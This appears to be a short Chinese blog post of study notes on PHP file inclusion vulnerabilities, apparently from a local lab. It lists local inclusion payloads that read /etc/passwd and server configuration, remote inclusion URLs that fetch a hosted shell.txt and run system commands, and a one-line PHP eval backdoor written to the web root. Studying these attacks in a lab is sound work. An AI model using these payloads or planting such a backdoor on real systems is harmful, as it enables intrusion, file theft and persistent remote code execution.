eveplw

导航

13.文件包含漏洞

1.后台PHP源码

 

2.利用条件

php.ini中allow_url_fopen=ON (默认开启)

用户参数可控且后台代码没有对包含的文件进行过滤

include函数会把任何后缀文件当成php执行

?filename=../SQL/common.php&username=admin&password=12345

?filename=/etc/passwd

?filename=/opt/lampp/etc/httpd.conf

 

3.远程文件包含

# vim /opt/lampp/etc/php.ini

allow_url_include=ON(默认关闭)

?filename=http://192.168.19.130:8443/security/Upload/shell.txt&code=phpinfo();
?filename=http://192.168.19.130:8443/security/Upload/shell.txt&code=system("ifconfig");

可以写入木马后门程序
shell.txt:
file_put_contents("temp/muma.php",<?php @eval($_GET['code']); ?>)

 

posted on 2022-08-19 16:57  eveplw  阅读(55)  评论(0编辑  收藏  举报